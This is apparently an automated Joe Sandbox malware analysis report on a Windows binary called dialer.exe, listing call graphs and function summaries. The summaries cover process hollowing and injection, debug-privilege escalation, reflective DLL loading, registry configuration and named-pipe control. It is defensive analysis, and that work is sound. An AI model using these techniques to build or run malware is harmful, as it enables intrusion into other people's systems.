ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                          Callgraph

                                                          Executed Functions

                                                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                          • API String ID: 4177739653-1130149537
                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                          • API String ID: 2561231171-3753927220
                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                          • String ID:
                                                          • API String ID: 4084875642-0
                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                          • String ID:
                                                          • API String ID: 3197395349-0
                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                          • String ID:
                                                          • API String ID: 1323846700-0
                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                          • String ID: .text$C:\Windows\System32\
                                                          • API String ID: 2721474350-832442975
                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2203880229-3489460547
                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                          • API String ID: 2071455217-3440882674
                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                          • String ID:
                                                          • API String ID: 3676546796-0
                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenWow64
                                                          • String ID:
                                                          • API String ID: 10462204-0
                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                          APIs
                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                          • String ID:
                                                          • API String ID: 3836936051-0
                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                          Non-executed Functions

                                                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 